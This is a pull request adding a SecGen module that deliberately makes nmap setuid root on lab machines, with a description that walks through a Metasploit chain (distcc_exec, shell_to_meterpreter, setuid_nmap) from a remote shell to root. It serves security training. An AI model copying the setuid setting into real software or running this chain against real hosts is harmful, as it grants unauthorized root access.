### PR TITLE
Vulnerability: Nmap setuid local privilege escalation

### DIFF
--- a/modules/utilities/unix/scanners/nmap/manifests/install.pp
+++ b/modules/utilities/unix/scanners/nmap/manifests/install.pp
@@ -1,0 +1,5 @@
+class nmap::install {
+  package { 'nmap':
+    ensure => installed,
+  }
+}

--- a/modules/utilities/unix/scanners/nmap/nmap.pp
+++ b/modules/utilities/unix/scanners/nmap/nmap.pp
@@ -1,0 +1,1 @@
+include nmap::install

--- a/modules/utilities/unix/scanners/nmap/secgen_metadata.xml
+++ b/modules/utilities/unix/scanners/nmap/secgen_metadata.xml
@@ -1,0 +1,21 @@
+<?xml version="1.0"?>
+
+<utility xmlns="http://www.github/cliffe/SecGen/utility"
+         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://www.github/cliffe/SecGen/utility">
+  <name>Nmap Security Scanner</name>
+  <author>Thomas Shaw</author>
+  <module_license>Apache v2</module_license>
+  <description>Nmap network host, service and security scanner.</description>
+
+  <type>utility</type>
+  <platform>linux</platform>
+
+  <!--optional details-->
+  <reference>https://nmap.org/</reference>
+
+  <requires>
+    <type>update</type>
+  </requires>
+
+</utility>

--- a/modules/vulnerabilities/unix/local/setuid_nmap/manifests/init.pp
+++ b/modules/vulnerabilities/unix/local/setuid_nmap/manifests/init.pp
@@ -1,0 +1,5 @@
+class setuid_nmap::init {
+  file { '/usr/bin/nmap':
+    mode => '4755',
+  }
+}

--- a/modules/vulnerabilities/unix/local/setuid_nmap/secgen_metadata.xml
+++ b/modules/vulnerabilities/unix/local/setuid_nmap/secgen_metadata.xml
@@ -1,0 +1,23 @@
+<?xml version="1.0"?>
+
+<vulnerability xmlns="http://www.github/cliffe/SecGen/vulnerability"
+          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+          xsi:schemaLocation="http://www.github/cliffe/SecGen/vulnerability">
+  <name>Nmap Setuid</name>
+  <author>Thomas Shaw</author>
+  <module_license>MIT</module_license>
+  <description>Nmap setuid local privilege escalation</description>
+
+  <type>access_controls</type>
+  <privilege>root</privilege>
+  <access>local</access>
+  <platform>linux</platform>
+
+  <!--optional vulnerability details-->
+  <difficulty>medium</difficulty>
+
+  <requires>
+    <module_path>modules/utilities/unix/scanners/nmap</module_path>
+  </requires>
+
+</vulnerability>

--- a/modules/vulnerabilities/unix/local/setuid_nmap/setuid_nmap.pp
+++ b/modules/vulnerabilities/unix/local/setuid_nmap/setuid_nmap.pp
@@ -1,0 +1,1 @@
+include setuid_nmap::init

--- a/scenarios/simple_examples/setuid_nmap_escalation_vulnerability.xml
+++ b/scenarios/simple_examples/setuid_nmap_escalation_vulnerability.xml
@@ -11,5 +11,6 @@
     <vulnerability access="remote" privilege="user"/>
     <vulnerability module_path="modules/vulnerabilities/unix/local/setuid_nmap"/>
 
+    <network type="private_network" range="dhcp"/>
   </system>
 </scenario>

--- a/scenarios/simple_examples/setuid_nmap_escalation_vulnerability.xml
+++ b/scenarios/simple_examples/setuid_nmap_escalation_vulnerability.xml
@@ -1,0 +1,15 @@
+<?xml version="1.0"?>
+
+<scenario xmlns="http://www.github/cliffe/SecGen/scenario"
+          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+          xsi:schemaLocation="http://www.github/cliffe/SecGen/scenario">
+  <system>
+    <system_name>box_with_remote_user_level_vuln_and_setuid_nmap_priv_escalation</system_name>
+    <base platform="linux"/>
+
+    <!--We need a remote user privilege vulnerability so we can escalate to root with setuid_nmap -->
+    <vulnerability access="remote" privilege="user"/>
+    <vulnerability module_path="modules/vulnerabilities/unix/local/setuid_nmap"/>
+
+  </system>
+</scenario>


### PR DESCRIPTION
# Vulnerability: Nmap setuid privilege escalation

In order to demonstrate the privilege escalation the scenario contains a remote user level vulnerability as well as setuid_nmap. 

We can use metasploit to exploit our remote user level vulnerability (exploits/unix/misc/distcc_exec - distcc_exec was selected in this example), upgrade our shell to meterpreter (post/multi/manage/shell_to_meterpreter) and then escalate to root (exploit/unix/local/setuid_nmap).


## 1. Exploiting the remote user level vulnerability (distcc_exec)

First step is getting onto the box as a non-root user. I use the -j flag on the exploit command to send the session into the background.

use exploit/unix/misc/distcc_exec
set RHOST 192.168.0.13
exploit -j
![setuid_nmap-1-distcc_exploited](https://cloud.githubusercontent.com/assets/3964474/18279520/c3efa214-744d-11e6-9fa6-b4e6e96482c7.png)
![setuid_nmap-2-distcc_exploit_bg](https://cloud.githubusercontent.com/assets/3964474/18279521/c40fdbc4-744d-11e6-8bdc-29feb26856c7.png)


## 2. Upgrade our standard shell to meterpreter

The setuid_nmap exploit requires a meterpreter session for use. Due to the distcc_exec module design we cannot use a meterpreter payload so we're given a standard shell. We can use the post-exploitation module shell_to_meterpreter to upgrade our session.

use post/multi/manage/shell_to_meterpreter
set SESSION n
exploit

![setuid_nmap-3-shell_to_meterpreter](https://cloud.githubusercontent.com/assets/3964474/18279528/cb9a46ea-744d-11e6-9aa4-1a7acf6ffaea.png)
![setuid_nmap-4-showing_local_privs](https://cloud.githubusercontent.com/assets/3964474/18279529/cbb4e022-744d-11e6-961b-cb5471b46c1a.png)


## 3. Escalate privileges through the setuid_nmap vulnerability

use exploit/unix/local/setuid_nmap
set SESSION n
exploit

![setuid_nmap-5-exploit_setuid_nmap](https://cloud.githubusercontent.com/assets/3964474/18279536/d0eaf3a6-744d-11e6-95a5-270a4ce9c25f.png)
![setuid_nmap-6-whoami](https://cloud.githubusercontent.com/assets/3964474/18279537/d0f19b66-744d-11e6-9fd4-442a56d04c4f.png)


Cheers,
Tom
 